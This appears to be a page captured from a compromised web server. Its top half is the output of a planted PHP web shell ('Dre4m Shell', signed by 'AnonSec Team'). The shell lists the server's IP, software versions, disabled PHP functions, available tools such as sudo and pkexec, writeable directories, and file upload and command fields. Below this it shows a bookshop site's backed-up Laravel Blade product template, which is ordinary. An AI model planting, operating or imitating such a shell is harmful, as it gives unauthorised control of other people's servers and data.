Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.128.31.106
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/resources/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/resources/views/shopDetails.blade.php_bkp-Feb-22-2021
@extends('template.default')

@section('content')
      <div class="header-breadcrumbs">
          <div class="container">
            <div class="row">
              <div class="col-lg-12 col-md-12 col-sm-12 sol-xs-12">
                <div class="breadcrumbs-title text-center">
                  {{-- <h2>Book</h2> --}}
                  <div class="subheader-pages">
                    <ul>
                      <li><a href="{{route('home')}}" style="color:#fff;">Home</a></li>
                     
                      <li>{{$categoryName}}</li>
                    </ul>
                  </div>
                </div>
              </div>
            </div>
          </div>
      </div>
       <div class="coursedetails-area">
            <div class="container-inner">
              <div class="row">

                <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12" id="@foreach ($Products as $data){{$data->ProductName}} @endforeach">
                  <div class="aboutus-video">
                    <div class="container">
                    
                      <div class="row col-md-12 col-sm-12 col-xs-12 p-0 mob-pl-10" style="margin-top: 30px;padding:0;">
                          <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6" style="padding-left: 27px;">
                              <h3>{{$categoryName}}</h3>
                          </div>  
                          </div>  
                          <div class="row col-md-12 col-sm-12 col-xs-12 p-0 mob-pl-10" style="margin-top: 30px;padding:0;">
                            <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6" style="padding-left: 31px;">
                              <a style="color: #FF9900 !important;text-decoration:underline;" href="http://amazon.com/author/joellevitt" target="_blank"><img src="public/assets/images/books/amazon button-01.png" class="amazon-logo" alt="amazon-logo" style=""></a>
                            </div> 
                            </div> 
                        <div class="row">
                          <?php
                                  $href='javascript:void(0)';
                                  $target='';
                                ?>
                       
                        @foreach ($Products as $data)
                          @if($data->ThirdPartyURL!='')
                          <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 contentSection" id="{{$data->ProductsNameForID}}">
                            <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12" >
                              <div class="">
                                <a href=""><img class="witnessImg" src="public/assets/images/productimages/{{$data->ProductPhoto}}" alt=""/></a>
                              </div>
                            </div>
                            <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12">
                              <div class="">
                                <div class="contentDetailsSection">
                                  <p><b><u> {{$data->ProductName}}</u></b></p>
                                  <p style="font-size:15px; text-transform: none;">{!!$data->ShortDescription!!}  </p>
                                </div>
                                <!-- <a href="{{$data->ThirdPartyURL}}"> {{$data->ThirdPartyURL}}</a></p> -->
                                <!-- <p>Qty:<input type="text"/></p> -->
                                <!-- <a href="{{$data->ThirdPartyURL}}"> go{{$data->ThirdPartyURL}}</a>  -->
                                
                               
                                <?php
                                  $href=$data->ThirdPartyURL;
                                  $target="target=_blank";
                                ?>
                               
                                <a href="{{$href}}" {{$target}}>
                                <button class="btn">Buy Now</button></a>
                                <hr>
                              </div>
                            </div>
                          </div>
                          @endif
                        @endforeach
                        
                        </div>
                    </div>
                  </div>
                </div>

               

              <!-- shop-area end hear -->


              </div>


          </div>
      




@endsection

@push('styles')
  <link href="{{{URL::asset('public/css/home.css')}}}" rel="stylesheet">
@endpush

@push('scripts')
@endpush

Anon7 - 2022
AnonSec Team